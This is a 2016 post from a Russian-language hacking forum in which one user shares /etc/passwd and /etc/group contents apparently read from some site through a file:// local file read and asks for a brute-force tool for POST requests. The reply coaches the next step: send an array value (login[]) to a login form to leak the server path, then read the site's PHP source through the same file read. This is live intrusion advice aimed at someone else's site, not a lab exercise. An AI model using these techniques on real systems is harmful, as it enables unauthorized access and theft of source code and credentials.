HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #20  
Старый 14.10.2016, 01:15
strelok20094
Guest
Сообщений: n/a
Провел на форуме:
24770

Репутация: 2
По умолчанию

Цитата:
Сообщение от sinfo  
sinfo said:

file:///etc/passwd да вот только что нашел,ток в другом месте
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
/etc/group
crontab:x:102:
Debian-exim:x:103:
mlocate:x:104:
ssh:x:105:
А есть брут??работающий с post запросами?
Значит смотри, если у тебя получилось прочитать локальный файл, ищи раскрытие путей например

пост в авторизации

site.com/login

post data

login[]=lol

дает нам /var/www/site.com/public_html/lol/db.php error 31 line

тогда мы имеем следующую возможность чтения

file:///var/www/site.com/public_html/index.php
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ